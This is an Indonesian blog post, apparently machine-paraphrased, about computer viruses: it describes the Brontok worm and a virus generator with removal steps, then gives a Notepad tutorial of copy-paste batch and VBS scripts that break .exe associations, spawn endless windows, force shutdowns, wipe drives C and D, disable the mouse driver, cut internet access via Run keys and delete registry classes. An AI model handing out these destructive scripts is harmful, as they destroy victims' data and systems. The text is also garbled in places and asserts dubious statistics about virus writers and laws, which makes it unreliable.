April 04, 2022
Home »
virus komputer 2
» virus komputer 2
virus komputer 2
April 04, 2022
virus komputer 2
halaman 2
·C:\Windows dengan nama file eksplorasi.exe (hidden)
C:\Windows\shellnew dengan nama sempalong.exe (hidden) C:\WINDOWS\system32 dengan nama %username"s Setting.scr (hidden)
C:\Documents and Settings\%user%\Local Settings\Application Data
dengan nama file
- Bron.tok-x-y, dimana x dan y menurunkan
- Loc.Mail.Bron.Tok, berisi alamat email yang diperoleh dari komputer yang terinfeksi
- Ok-SendMail-Bron-tok, berisi email yang berhasil dikirim - csrss.exe - inetinfo.exe - Kosong.Bron.Tok.txt
- lsass.exe - NetMailTmp.bin - services.exe
- smss.exe - Update.3.Bron.Tok.bin - winlogon.exe
C:\Documents and Settings\bagle\Start Menu\Programs\Startup nama file - Empty
C:\Documents and settings\%Users%\Templates
- Brengkolang.com
memicu file pada setiap folder dimana file ini memiliki nama yang sama dengan folder itu dengan ciri-ciri
Icon yang dipakai berupa Folder Ukuran file 42 Kb
Ekstension .EXE
Rontokbro juga akan melakukan perubahan pada file C:\AUTOEXEC.BAT
dengan menambah nambah baris perintah PAUSE”.
Agar Rontokbro dapat aktif begitu komputer dinyalakan, ia akan memicu registry beberapa registry key yaitu:
Bron-Spizaetus
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersi
on\Run
Tok-Cirrhatus
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Shell dengan value Explorer.exe C:\Windows\Eksplorasi.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon
Disable Registry editor seperti kebanyakan virus yang ada, virus ini juga akan menonaktifkan program yang dimungkinkan dapat mempersingkat keberadaan
“mereka diantaranya fungsi registry editor dengan menambah nambah sebuah registry key:
DisableRegistryTools =1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
Jika fungsi registry editor dijalankan maka akan muncul pesan error:
Disable CMD
Pada registry
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
Selain menambah nambah string pada registry key, virus in juga akan menambah nambah
option di menu [startup] pada msconfig.
- Sempalong - Smss - Empty
virus ini menghilangkan [folder options] pada menu [tools] pada [Windows explorer], sehingga user tidak akan bisa menambah nambah pilkan setiap file yang disembunyikan (hidden) oleh virus itu , dengan menambah nambah string value :
NoFolderOptions"=dword:00000001
pada registry key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Pol
icies\Explorer
Rontonbro juga akan memicu task schedule pada windows dimana schedule ini .akan dijalankan setiap jam 5.08 PM, dengan menjalankan file yang berada
didirektori:
C:\Documents and Settings\%Users%\Templates
Restart Komputer Otomatis salah satu kelebihan yang dimiliki oleh Rontokbro .adalah dapat memicu komputer restart, jangan harap up-date patch dapat
menyelesaikan masalah ini, ini disebabkan sebab Rontokbro tidak .mengeksploitasi celah keamanan seperti yang biasa dipakai oleh virus Sasser atau
Blaster. .Rontokbro akan merestart komputer jika anda berusaha menjalankan suatu program tertentu seperti regedit, msconfig jika anda menjalankan software
pengganti Task manager seperti pocket Killbox HijackThis dan salah satu kelebihan lain yang dimiliki adalah kemampuannya untuk merestart komputer
walaupun dalam mode safe mode walapun, oleh sebab itu diperlukan trik untuk .menangani masalah itu . kemungkinan besar pembuat Rontokbro selalu
mengikuti saran dan perkembangan terakhir sehingga ia akan makin sulit dibasmi .sebab selalu mengupdate dirinya. .Rontokbro akan mengambil alamat email pada semua file yang mengandung .ext.
.asp .cfm .csv .doc .eml .html .php .txt .wab
Selain menyebar melaui email, Rontokbro juga akan menyebar melalui Disket/USB dengan memicu file pada folder/subfolder yang ada didisket/USB atau
pada root USB itu sendiri, file yang diciptakan itu memiliki ciri-ciri: Icon mirip Folder
Ukuran 42 Kb Ext. EXE
Rontokbro juga akan mencoba untuk melakukan koneksi dengan mengirimkan ping request ke salah satu situs dewasa seperti kaskus.com dan 17tahun.com, ini .lah salah satu faktor yang dapat dapat memperlambat system komputer tetapi sebab
penyebaran koneksi internet di Indonesia relatif masih lambat, dampak dari ini akan kurang terasa pada user dialup rumahan sebab tidak selalu terkoneksi dan
dampak terbesar akses ke dua situs itu akan besar pengaruhnya jika komputer .yang terkena Ronrokbro adalah komputer rumahan yang memiliki koneksi ADSL dan selalu terkoneksi ke internet, komputer Warnet atau kantor yang selalu terkoneksi ke internet.
Seperti layaknya antivirus, Rontokbro juga mencoba untuk melakukan up-date .ke salah satu situs yang sudah ditentukan, jadi jangan lengah sebaiknya up-date antivirus Anda agar tidak menjadi korban berikutnya dan jangan lupa agar tidak .sembarangan dalam bertukar data melalui disket/usb satu tips yang mungkin berguna adalah dengan mengenali jenis file yang akan dijalankan, dan usaha kan untuk selalu
menambah nambah pilkan ekstesi dari file itu agar dapat mengetahui type dari file itu . Satu cara yang efektif untuk mencegah Rontokbro adalah dengan memakai
antivirus yang memberi support lokal sehingga definisinya dapat mengimbangi munculnya varian baru Rontokbro yang sampai saat ini masih terus dikeluarkan. Cara membersihkan Rontokbro
1. Lakukan pembersihan melalui safe mode
2. Matikan proses virus .Untuk mematikan proses itu sebaiknya jangan memakai program pocket killbox atau HijackThis sebab komputer akan langsung restart jika anda menjalan kan tools ini, kami sarankan untuk memakai tools lain yang seperti PROCEXP.EXE dapat didownload di situs http://www.sysinternals.com/Utilities/ProcessExplorer.html Hapus proses dengan cara "klik kanan nama proses" dan pilih "kill prosess
tree", agar tidak salah dalam penghapusan cari proses yang memiliki icon "folder", .seperti:
smss.exe services.exe winlogon.exe
Atau dapat melakukan tahap antaralain :
a. Restart komputer dan masuk dalam mode "safe mode with command prompt”, dengan cara menekan tombol [F8] saat komputer restart, ini dimaksudkan agar virus Rontokbro tidak aktif pada posisi ”safe mode dan
komputer tidak melakukan restart selama proses pembersihan.
b. Sesudah masuk mode ”Command Prompt tekan tombol [CTRL]+[ALT]
+[Del] secara bersamaan, kemudian pilih [Task Manager], sesudah layar Task .Manager muncul, klik menu [File] pilih [New Task (Run..), kemudian ketik
[explorer] pada jendela [create new task file] sesudah itu klik enter.
c. Kemudian akan muncul layar desktop (layaknya masuk ke mode "safe mode")
d. Aktifkan kembali fungsi registry editor dan hapus string yang dibuat oleh virus, tulis script seperti yang ada pada angka [3], kemudian simpan menjadi
nama file "repair.inf", sesudah itu jalankan file itu dengan cara: klik kanan file [repair.inf] kemudiani pilih [install]
e. Hapus option [Smss], [Empty] dan [Sempalong] pada msconfig ditabulasi [startup)
f. Agar ”Folder option pada windows explorer dapat muncul, restart kembali komputer dan lakukan seperti langkah pada point (a dan b)
g. Sesudah komputer masuk ke mode "safe mode" tampilkan semua file yang disembuyikan (lakukan perubahan ini pada "folder option", lihat gambar yang
ada pada point [5], selanjunya ikuti petunjuk pembersihan Rontokbro seperti yang ada pada point (6-9)
3.Tulis script berikut dan simpan di notepade beri nama file repair.inf, jalankan file itu (klik kanan [repair.inf] pilih [install]), ini dimaksudkan untuk mengaktifkan kembali fungsi registry editor, menambah nambah pilkan kembali [folder option] dan menghapus semua string yang sudah dibuat oleh virus[Version]
Signature="$Chicago$"
Provider=Vaksincom
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0,
"Explorer.exe"
[del]
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistr
yTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableCMD
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOpt
ions
HKCU, Software\Microsoft\Windows\CurrentVersion\Run,Tok-Cirrhatus
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Bron-Spizaetus
4. Restart komputer dan masuk kembali ke mode "safe mode" jangan keposiosi "normal" sebab file induk dari virus ini masih ada (eksplorasi.exe dan .sempalong.exe)
5. Tampilkan file yang disembunyikan, lakukan perubahan ini pada [folder Option]
6. Hapus file yang dibuat oleh Rontokbro
- C:\Windows dengan, nama file eksplorasi.exe (hidden)
- C:\windows\shellnew, dengan nama sempalong.exe(hidden)
- C:\WINDOWS\system32, dengan nama %username"s Setting.scr (hidden)
- C:\Windows\pss, dengan nama file [Empty.pifStartup]
- C:\Documents and Settings\%user%\Local Settings\Application Data dengan
nama file
- Bron.tok-[x]-[y], di mana [X] dan [Y] menunjukan angka - Loc.Mail.Bron.Tok - Ok-SendMail-Bron-tok
- csrss.exe - inetinfo.exe - Kosong.Bron.Tok.txt
- lsass.exe - NetMailTmp.bin - services.exe
- smss.exe - Update.3.Bron.Tok.bin - winlogon.exe
- smss.exe
7. Edit kembali file autoexec.bat di direktori C:\ dan hapus baris perintah [pause]
8. Hapus scheduled tasks yang dibuat oleh Rontokbro (klik [Start],[Settings], [Control Panel], kemudian klik 2 kali menu [scheduled tasks].
9. Hapus file yang dibuat oleh virus, untuk lebih cepatnya pakai fasilitas [serach] Klik [Start]
Klik [Search], kemudian klik [For Files or Folders]
Kemudian pilih [All files or Folders]
Klik option [What size is it ?]
Kemudian pilih option [Specify Size (in Kb)]
Pada kombo Box, pilih [At most] kemdian isi ukuran file dengan angka [43], .sesudah itu klik [Search]
Sesudah proses pencarian selesai, sortir berdasar ukuran (size), kemudian hapus file yang memiliki ukuran 42 kb, jangan sampai terjadi kesalahan dalam
penghapusan file sebab ada beberapa file windows yang memiliki ukuran 42 kb, cari file yang icon folder dengan extension. EXE.
10. Untuk pembersihan lebih cepat sebaiknya pakai antivirus yang sudah dapat mengenali Rontokbro.N jangan lupa update antivirus yang terinstall, sebagai
informasi antivirus Norman dengan up-date terakhir sudah dapat menganali virus ini dengan baik.
Tips berikut ada beberapa tips dan trik yang dapat dipakai terhindar dari serangan virus lokal
Jangan sembarangan dalam melakukan pertukaran data melalui disket/usb ,Patikan disket/Usb bersih dari virus dengan melakukan scan pada disket/usb sebelum dipakai . ,Kenali jensi file yang akan dijalankan
Biasakan untuk menambah nambah pilkan extensi file, ini dimaksudkan untuk mengetahui jenis file sebelum dijalankan.
virus dapat merusak perangkat lunak komputer dan dapat merusak perangkat keras komputer dapat memicu kerusakan dengan cara memuat program yang memaksa over process ke perangkat tertentu. Efek negatif virus adalah memperbanyak dirinya sendiri, yang memicu sumber daya pada komputer (seperti pemakaian memori) menjadi berkurang Hampir 99% virus berbasis sistem operasi Windows. virus menggambarkan segala jenis serangan pada komputer. digolongkan ke dalam kategori
Worm - mengganda dirinya sendiri pada hard disk. Ini memicu sumber hard disk menjadi penuh akan worm itu. Trojan - Mengambil data pada komputer yang sudah terinfeksi dan mengirimkannya pada pembuat trojan itu sendiri. Backdoor - Hampir sama dengan trojan. Namun, Backdoor mirip file yang baik-baik saja. contohnya game. Spyware - Virus yang memantau komputer yang terinfeksi. Rogue - yaitu program yang meniru program antivirus dan menambah nambah pilkan
aktivitas layaknya antivirus normal, dan memberi peringatan palsu tentang adanya virus. agar pemakai membeli dan mengaktivasi program antivirus palsu itu dan mendatangkan uang bagi pembuat virus rogue itu . Juga rogue dapat membuka celah keamanan dalam
komputer guna mendatangkan virus lain Rootkit - Virus yang bekerja mirip kerja sistem komputer yang biasa saja. Polymorphic virus - Virus yang gemar berubah-ubah agar tidak dapat terdeteksi. Metamorphic virus - Virus yang mengubah pengkodeannya sendiri agar lebih
sulit dideteksi.Akibat yang ditimbulkan oleh virus adalah Banyak aplikasi yang error Sistem komputer jadi pelan atau lambat Sistem komputer tidak bisa dibuka Data disembunyikan virus, semua Data dan file terhapus rusak permanen,
Fakta tentang virus ada 10 :
virus pertama dinamakan Virus Creeper. Hal itu terdeteksi di ARPANET, pendahulu dari apa yang kita sebut hari ini, internet pada awal tahun 1970. Ini
adalah program replikasi diri ditulis sebagai percobaan oleh Bob Thomas di BBN Technologies pada 1971.
MyDoom (juga dikenal sebagai W32.MyDoom@mm) adalah worm komputer menyebar tercepat yang pernah dibuat. Ini pertama kali terlihat pada tahun 2004,
dan itu menyebar begitu cepat, catatan dari yang belum melampaui pada 2017. Kembali pada tahun 2004, diperkirakan akan berdampak hampir 25% dari semua email yang dikirim. ini memicu kerusakan komputer,
Penulis virus yang khas adalah pelajar bahasa pemprograman , antara 14 sampai 35 tahun. penulis virus kebanyakan anak-anak dan siswa yang ingin berpercobaan dan mengasah keterampilan program mereka. Programmer virus, yang dikenal sebagai
penulis virus, sengaja menulis program virus.
Sekitar 90% dari hacker profesional dan penulis virus bekerja di bawah kontrak organisasi pemerintah besar. Pekerjaan utama mereka adalah untuk mencari celah, masalah keamanan dan menembus ke jaringan perusahaan. Ini celah dan kelemahan keamanan kemudian ditetapkan oleh programmer lain untuk lebih mengamankan sistem mereka.
Menurut Microsoft keamanan Intelligence, Panda keamanan dan Consumer Reports, sekitar 90% komputer dunia diselipkan beberapa bentuk virus atau trojan permanen tidak berbahaya di dalam komputer mereka. Sekarang itulah yang kita dinamakan virus yang sebetulnya ,
sekitar 240 juta rumah tangga mengalami loading berat, dan lebih dari 160 juta rumah tangga dunia memiliki masalah loading yang serius 10 tahun terakhir. Internasional, Amerika Serikat diserang oleh jutaan worm komputer dan virus tersembunyi yang tidak berbahaya , diikuti oleh negara negara miskin dunia,, menulis belajar membuat virus tidak dianggap sebagai tindakan ilegal di dunia . Beberapa negara lain memiliki undangundang kejahatan cyber jauh lebih lemah dibandingkan AS. contohnya , jepang tindakan menulis virus tidak ilegal, sementara pertukaran massal virus untuk tujuan apapun dibatasi didunia, Microsoft Research mengungkapkan bahwa sekitar 1 dari setiap 140 program download memiliki beberapa elemen virus canggih berbahaya yang tidak hilang melekat padanya. Meskipun semua web browser sekarang yang modern memiliki metode gratis untuk membasmi ribuan jenis virus spam dan mengarahkan pemakai akan adanya konten berbahaya, hampir 2% saja yang berhasil mendeteksi virus spam berbahaya,
sebab meningkatnya ketidak amanan semua media termasuk komputer, hacker sudah menemukan lebih banyak pengalaman dalam melihat kelemahan sasaran Ini dinamakan Social Engineering. pemakai
memperoleh kabar ini dari beberapa link di Facebook, seseorang hacker mengarahkan mereka untuk men-download beberapa aplikasi , yang pada gilirannya adalah berbahaya. modus utama dari virus menyebar adalah Internet,removable media, CD, DVD ,disket. Sekitar 60 aplikasi pembuat virus dibuat dan menyebar ke alam liar , sekali lagi, antivirus dan keamanan perusahaan sangat kerepotan membasmi aplikasi pembuat virus dan terus-menerus waspada dan memperbarui database mereka
virus Aksika Virus open source yang satu itu memiliki
banyak varian. sebab source code-nya memang disediakan bebas di Internet, jadi siapapun dapat dengan mudah mengubah dan meng-compile source
code-nya dan jadilah varian baru.Berawal dari kemudahan itulah, banyak programer pemula mencoba coba untuk memicu virus tanpa perlu repot. Paling yang diperlukan hanyalah pengetahuan seputar operating system dan programming. Namun kemudahan itu belum seberapa, bila dibandingkan dengan memakai program Virus Generator. Dari namanya saja, kita sudah dapat mengira kegunaan dari
program itu . Ya, Virus Generator yaitu program untuk memicu virus secara mudah dan instan. Bermula dari sampel sebuah virus yang lumayan banyak dikirimkan PC Media Antivirus mengenalnya dengan nama Gen.FFE-Fajar, namun antivirus lain ada juga yang menyebutnya dengan nama Brontok.D. Dengan
penyelidikan sederhana akhirnya diketahui bahwa virus itu dibuat memakai Virus Generator.Fast Firus Engine Pembuat Generator itu menambah nambah program buatannya itu dengan nama Fast Firus Engine. program ini hanya untuk tujuan pembelajaran dan tidak untuk
tindakan merusak. Namun tetap saja, bila program ini sudah jatuh ke tangan yang salah, pasti akan dipakai untuk pengrusakan. Virus Generator ini dibuat memakai bahasa Visual Basic dan di-compress memakai packer tELock. Dalam paketnya ada dua buah file, yaitu Fast Firus Engine.exe dan data.ex_. Fast Firus Engine. exe yaitu program utama dalam pembuatan virusnya dan sementara file data.ex_ yaitu badan virus asli yang belum direkayasa . Saat file Fast Firus Engine.exe dijalankan, maka pemakai akan dihadapkan pada
sebuah interface. Anda hanya disuruh mengisikan nama virus, nama pembuat, dan pesan-pesannya. Lalu dengan menekan tombol Generate, maka jadilah virus Anda. Cara kerja dari Generator itu sangat sederhana. Ia hanya menambah nambah data yang Anda masukkan tadi ke bagian akhir file virus asli (data.ex_). Nantinya informasi itu dipakai oleh virus dalam proses infeksi.
Virus hasil ciptaan FFE terlihat sederhana. Sama seperti Generatornya, ia juga dibuat memakai bahasa Visual Basic yang di-compile dengan metode NativeCode. Lalu di compress memakai tELock agar ukurannya semakin kecil. Virus ini memiliki ukuran tubuh asli sebesar 55.296 bytes. Saat virus kali pertama dieksekusi, ia akan memicu beberapa file induk di beberapa lokasi. Seperti di direktori \%WINDOWS%\, akan ada file dengan nama.exe, Win32 exe, activex.exe, dan %virusname% (nama virus sesuai yang diisikan oleh sang pembuatnya pada Generator). Di \%WINDOWS%\ %system32%\ akan ada file
copy.pif, _default.pif, dan surif.bin. Selain itu, ia juga mengubah atau memicu file Oeminfo.ini yang yaitu bagian dari System Properties. Jadi jika komputer
Anda terinfeksi oleh virus hasil generate dari FFE, maka pada System Properties akan ada tulisan Generated by Fast Firus Engine . Di direktori \%WINDOWS%\%System%\ akan ada beberapa file induk lagi yang memakai nama yang sama seperti file system milik Windows, seperti csrss.exe,
winlogon.exe, lsass.exe, smss.exe, svchost. exe, dan winlogon.exe. .Dan tak lupa, pada root drive pun akan ada file dengan nama baca euy.txt yang berisikan pesan pesan dari si pembuat virus. Jadi pada saat memicu virus dengan memakai Generator itu , maka pembuatnya akan disuguhkan beberapa kotak
input, seperti Author of the virus, Name of the virus, dan Messages. Nah, isi dari kotak messages ini yang nantinya ditampilkan pada file baca euy.txt itu .
Sesudah virus berhasil meng-copy-kan file induknya ke dalam sistem itu , ia akan menjalankan file induk tadi, sehingga pada memory akan ada beberapa process
virus, seperti csrss.exe, winlogon.exe, lsass. exe, smss.exe, svchost.exe, danwinlogon.exe. Nama process yang mirip dengan process/services milik Windows
itu mungkin sengaja untuk mengecoh user. Untuk membedakannya, Anda dapat melihat path atau lokasi process itu dijalankan. Process virus ini biasanya berjalan di direktori System sementara process/services milik Windows yang running biasanya
berasal dari direktori System32.MengubahRegistry
Virus ini menambah nambah beberapa item startup pada registry agar pada saat memulai Windows ia dapat running secara otomatis atau untuk mengubah setting-an Windows agar sesuai keinginannya. Informasi mengenai registry yang diubah ubah nya tidak akan
dapat dengan mudah kita lihat sebab dalam kondisi terenkripsi. Yang ia ubah adalah seperti nilai dari item Userinit, yaitu dengan menambah nambah parameter ke file induk. Pada key HKEY_CURRENT_
USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load juga akan
diubah ubah itemnya agar mengarah ke file induknya dengan nama Activex.exe. Pada HKEY_CURRENT_USER \Software\Microsoft\ Windows\CurrentVersion\Run\ akan ada item baru dengan nama present. Key HKEY_
LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run\ akan ada item baru juga dengan nama Default dan %username%, username di sini yaitu nama user yang sedang aktif saat itu.
Virus hasil generate dari FFE juga mengubah shell extension untuk file .exe, yaitu dengan mengubah type information dari Application menjadi File Folder. Setting-an folder Options juga diubah ubah agar tidak menambah nambah pilkan extension dan setiap fi le dengan
attribut hidden. Dan agar dapat aktif pada safe-mode, ia pun mengubah nilai dari item SafeBoot.
Dengan memakai bantuan registry Image File Execution Options, virus ini juga menambah nambah item baru pada section itu dengan nama cmd.exe, msconfi g.exe,
regedit.exe, dan taskmgr.exe. Maksudnya adalah agar setiap user yang mengakses program dengan nama file seperti itu, maka akan di-bypass oleh Windows dan dialihkanke file induk si virus Virus ini dapat menyebar melalui media penyimpan data seperti flash disk. Saat Anda mencolokkan flash disk pada komputer yang terinfeksi, maka pada flash disk itu akan ada beberapa file baru, seperti explorer.exe, %virusname%.exe, dan
msvbvm60.dll. Juga beberapa file pendukung seperti desktop.ini, autorun.inf agar ia dapat running otomatis pada saat mengakses flash disk itu . File virus lainnya pun disimpan pada direktori baru di flash disk itu dengan nama Recycled yang berisikan file Firus.pif dan Folder.htt. Kesemua file virus itu dalam kondisi hidden sehingga tidak terlihat.Untuk dapat bertahan hidup, virus ini pun akan mencoba untuk memblok setiap
program yang tidak ia inginkan seperti tools atau program antivirus termasuk PCMAV. Sama seperti halnya data registry yang diubah ubah , data mengenai program apa saja yang diblok olehnya juga ada dalam tubuhnya dalam kondisi terenkripsi. Jadi, saat virus sudah stay di memory, ia akan memonitor setiap program yang diakses oleh user, yaitu dengan membaca nama file dan juga caption Window. Beberapa nama file antivirus yang dicoba untuk dibloknya adalah nav.exe, avgcc.exe, njeeves.exe,
ccapps.exe, ccapp.exe, kav.exe, nvcoas.exe, avp32.exe, dan masih banyak lagi yang lainnya. Termasuk beberapa program setup atau installer juga tidak dapat dijalankan pada komputer terinfeksi.
memicu program/aplikasi yang berexstensi .exe tidak mau jalan
Buka program cmd nya melalui klik start - run - ketik cmd atau bisa melalui keyboard dengan
mengetik key windows + R lalu ketik cmd dan dan tekan enter lalu saat n script berikut di
cmd "ASSOC.exe=.hank" tanpa tanda petik lalu tekan enter nah, ini memicu program/aplikasi
yang berexstensi .exe tidak mau jalan
Tapi tenang, ini bisa dikembalikan seperti semula dengan cara buka cmd nya lagi lalu ketik
"ASSOC.exe=EXEFILE
memicu komputer menjadi eror
Sekarang saya akan menjelaskan cara memicu virus memakai Notepad : Buka notepad nya
melalui start - all programs - accessories - notepad kemudian ketik kode script berikut ke
notepad :
------
Start
Start
------
lalu simpan di notepad dengan nama apa saja dengan exstensi .bat contoh : "eror.bat"
tanpa tanda kutip dan Save As Type ganti menjadi All Files. Trik ini memicu komputer menjadi
eror, sebab akan membuka CMD yang banyak jika file "eror.bat" itu di buka.
virus untuk memicu beberapa folder secara otomatis
Dengan menjalankan virus ini maka secara otomatis akan memicu sebuah folder secara
otomatis. Caranya seperti biasa simpan kode dibawah ini kedalam file multifol.bat.
@echo off :RON md folder1 md folder2 md folder3 md folder4 md folder5 start folder1 start
folder2 start folder3 start folder4
start folder5 goto RON
memicu notepad terbuka secara otomatis
silahkan ketik/ copas kode script berikut ke notepad :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Simpan di notepad dengan nama apa saja dengan exstensi .bat sama seperti yang tadi, contoh
"eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files. Trik ini akan memicu
notepad terbuka dengan sendirinya secara otomatis.
memicu tombol backspace menjadi eror menekan terus menerus secara otomatis
tiru ketik kode script berikut ke notepad :
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Simpan kode script itu di notepad dengan nama apa saja yang penting tidak lupa menuliskan
exstensi .vbs contoh : "eror.vbs" tanpa tanda kutip dan Save As Type ganti menjadi Al Files. Trik ini
memicu tombol backspace menjadi eror dan menekan dengan sendiri nya.
virus untuk enter tak berujung
Set wshShell = wscript.CreateObject(”WScript.Shell”) do
wscript.sleep 100
wshshell.sendkeys (enter)”
loop
Caranya seperti biasa dari notepad lalu simpan kedalam file endenter.bat.
memicu cd/dvd room buka tutup dengan sendiri nya
langsung aja tiru ketik kode script berikut ke notepad :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Simpan kode itu di notepad dengan nama bebas dan tam exstensi .vbs contoh : "eror.vbs" dan Save As Type ganti menjadiAll
Files, maka akan bisa memicu CD/DVD Room buka tutup dengan sendirinya secara otomatis.
caps lock menyala terus menerus tak terkendali,
langsung saja tiru ketik kode script berikut di notepad
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Simpan kode script itu dengan nama bebas dan dengan exstensi .vbs contoh "eror.vbs"
dan Save As Type ganti menjadi All Files, maka jika File ini di buka akan memicu Caps Lock
menyala terus menerus.
virus memicu caps lock menari
Set wshShell =wscript.CreateObject(“WScript.Shell”) do
wscript.sleep 100
wshshell.sendkeys {CAPSLOCK} wshshell.sendkeys {NUMLOCK}”
loop
Sekarang simpan sebagai file dancecap.bat.
komputer menjadi shoutdown
copas ke notepad :
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
Simpan kode script itu dengan nama bebas dan dengan exstensi .vbs contoh "eror.vbs"
dan Save As Type ganti menjadi All Files, maka jika file ini di buka akan memicu komputer
shoutdown atau mati.
komputer menjadi shoutdown
langsung saja tiru ketik kode script berikut ke notepad :
@echo shutdown -s t 1 f
Simpan kode script itu dengan nama bebas dan dengan exstensi .bat lain dengan trik yang
no 7, contoh : "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files, Maka jika file
ini dibuka akan sama dengan no 7 yaitu memicu komputer Shoutdown, hanya saja yang
membedakan adalah yang ini berisi waktu, lihat angka pada kode script itu yang berwarna
biru, itu adalah waktu yang diperlukan untuk mematikan komputer, bisa di atur sesuai keinginan
(1 = 1 detik)
komputer akan dipenuhi oleh100000 tourstart
Kali ini trik yang lumayan berbahaya, sebab komputer akan dipenuhi oleh 100000000 tourstart yang akan memenuhi layar monitor dan akan memicu komputer menjadi hang, untuk mengatasinya dapat mendelete semua tourstart itu atau langsung merestart komputer. Silahkan tiru ketik kode script berikut ke notepad :
option explicit
dim wshshell
set wshshell=wscript.createobject(“wscript.shell”)
dim x
for x = 1 to 100000000
wshshell.run tourstart.exe
next
Simpan dengan nama bebas dan dengan exstensi .vbs contoh : "virus.vbs" tanpa tanda kutip dan Save As type ganti
menjadiAll Files. Pada angka yang saya beri wara biru, itu bisa di ganti sesuai keinginan, bisa dibuat menjadi 100 atau
1000 saja, dan begitu file ini dibuka akan memicu tourstart sesuai dengan angka yang ditulis pada kode tesebut,
menghapus semua seluruh data di hardisk tanpa terkecuali
langsung saja tiru ketik kode script berikut di notepad :
@echo off
DEL C: -Y
DEL D: -Y
Simpan dengan nama bebas dan exstensi .bat contoh "virus.bat" tanpa tanda kutip dan Save As
Type ganti menjadi All Files dan simpan , tapi JANGAN DIKLIK sebab bisa berakibat fatal bagi
komputer anda.
menghapus semua seluruh data di hardisk tanpa terkecuali
memicu Virus Untuk Hapus Hard Drive Buka notepad di komputer Anda. Copy kode yang
saya sediakan di bawah ini dan paste di notepad itu .
@Echo off Del C:\ *.* |y
Kemudian menyimpanya sebagai file virus.bat.
Hanya Itu saja, tinggal menjalankan file itu dan melihat keajaiban. Ini akan menghapus semua
semua data di Drive C.
menonaktifkan fungsi mouse
Copy dan paste kode dibawah ini ke notepad.
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\ Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
Simpan file sebagai disablemouse.bat dan jalankan.
memicu virus untuk menonaktifkan internet secara permanen
Salin kode di bawah ini dan simpan sebagai file DisInt.bat.
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t
reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve
rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED!
PAUSE
hapus registry file key
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been destroyed. GOTO MESSAGE
Simpan sebagai delreg.bat.
Kejahatan pada dunia komputer jaringan Internet seperti serangan virus, worm, Trojan, Denial of Service (DoS), Web deface, pembajakan software, sampai pencurian kartu kredit semakin menjamur,.kejahatan dunia komputer meningkat sejalan dengan perkembangan teknologi pada bidang ini. ini sebetulnya sudah muncul sejak awal. Kemunculan teknologi komputer hanya bersifat netral. kejahatan komputer melalui jaringan internet dinamakan Cybercrime. Pada tahun 1949, John von Newman, yang menciptakan Electronic Discrete Variable Automatic Computer (EDVAC), menjelaskan transkripnya yang berjudul Theory and Organization of Complicated Automata. Dalam transkripnya dibahas kemungkinan program yang dapat menyebar dengan sendirinya.
Tahun 1960, para ahli di lab BELL (AT&T) labolatorium terbesar di dunia yang menghasilkan produk dunia komputer- menerapkan teori john v neuman. Mereka bermain-main dengan teori itu untuk suatu jenis game. , para peneliti memicu permainan dengan suatu program yang dapat memusnahkan program buatan lawan, kemampuan membenahi dirinya sendiri lalu balik menyerang kedudukan lawan. Program permainan ini juga dapat memperbanyak dirinya secara otomatis. Perang program ini dinamakan Core War, pemenangnya adalah pemilik program sisa terbanyak dalam selang waktu tertentu. sebab sadar akan bahaya program itu bila sampai bisa bocor keluar laboratorium (terutama sekali sebab C dan C++ adalah salah satu pemrograman bahasa tingkat tinggi pembuat virus saat itu terlalu mudah dipelajari yang sangat berbahaya), maka setiap selesai permainan, bahasa program dan virus itu wajib selalu dimusnahkan,
